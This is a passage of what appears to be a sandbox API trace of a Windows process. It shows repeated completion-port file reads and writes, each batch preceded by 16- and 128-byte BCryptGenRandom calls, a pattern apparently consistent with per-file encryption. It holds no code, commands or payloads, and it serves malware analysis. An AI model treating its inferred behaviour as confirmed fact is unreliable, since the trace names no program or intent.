CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.740] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0152.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0152.741] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.741] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.741] free (_Block=0x3e305b8) [0152.741] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.741] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.742] free (_Block=0x1fa91d0) [0152.742] free (_Block=0x1fa2ed8) [0152.742] free (_Block=0x1fa90b8) [0152.742] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.968] CloseHandle (hObject=0x170) returned 1 [0152.968] free (_Block=0x3d70450) [0152.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.974] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0152.982] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x918c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.003] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.004] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.004] free (_Block=0x3e305b8) [0153.004] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.004] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.004] free (_Block=0x1fa91d0) [0153.004] free (_Block=0x1fa2ed8) [0153.004] free (_Block=0x1fa90b8) [0153.004] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.016] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.016] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.016] free (_Block=0x3e305b8) [0153.016] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.016] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.016] free (_Block=0x1fa91d0) [0153.016] free (_Block=0x1fa2ed8) [0153.016] free (_Block=0x1fa90b8) [0153.016] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.026] CloseHandle (hObject=0x170) returned 1 [0153.027] free (_Block=0x3d70450) [0153.027] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.029] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x6bc2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.030] CloseHandle (hObject=0x338) returned 1 [0153.030] free (_Block=0x3ef0008) [0153.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.119] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.159] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x899c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.193] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4de6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0153.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.214] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.214] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.214] free (_Block=0x3e305b8) [0153.214] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.214] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.214] free (_Block=0x1fa91d0) [0153.214] free (_Block=0x1fa2ed8) [0153.214] free (_Block=0x1fa90b8) [0153.214] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.225] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x26f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.250] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x975e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.255] CloseHandle (hObject=0x308) returned 1 [0153.255] free (_Block=0x1ff1e60) [0153.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.255] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xced0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0153.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.282] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x4b40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.302] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x80d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.304] CloseHandle (hObject=0x170) returned 1 [0153.304] free (_Block=0x3df0008) [0153.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.314] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.314] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.315] free (_Block=0x3e305b8) [0153.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.315] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.315] free (_Block=0x1fa91d0) [0153.315] free (_Block=0x1fa2ed8) [0153.315] free (_Block=0x1fa90b8) [0153.315] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.317] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xcba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.318] CloseHandle (hObject=0x170) returned 1 [0153.318] free (_Block=0x3df0008) [0153.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.329] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.329] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.329] free (_Block=0x3e305b8) [0153.329] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.329] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.330] free (_Block=0x1fa91d0) [0153.330] free (_Block=0x1fa2ed8) [0153.330] free (_Block=0x1fa90b8) [0153.330] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.331] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5700, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.344] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x60c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.357] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x51be, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.370] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x59a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.384] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1334, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.385] CloseHandle (hObject=0x170) returned 1 [0153.386] free (_Block=0x3df0008) [0153.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.395] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.395] free (_Block=0x3e305b8) [0153.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.395] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.396] free (_Block=0x1fa91d0) [0153.396] free (_Block=0x1fa2ed8) [0153.396] free (_Block=0x1fa90b8) [0153.396] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.397] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.409] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.410] CloseHandle (hObject=0x170) returned 1 [0153.410] free (_Block=0x3df0008) [0153.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.421] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.421] free (_Block=0x3e305b8) [0153.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.421] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.421] free (_Block=0x1fa91d0) [0153.421] free (_Block=0x1fa2ed8) [0153.421] free (_Block=0x1fa90b8) [0153.421] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, 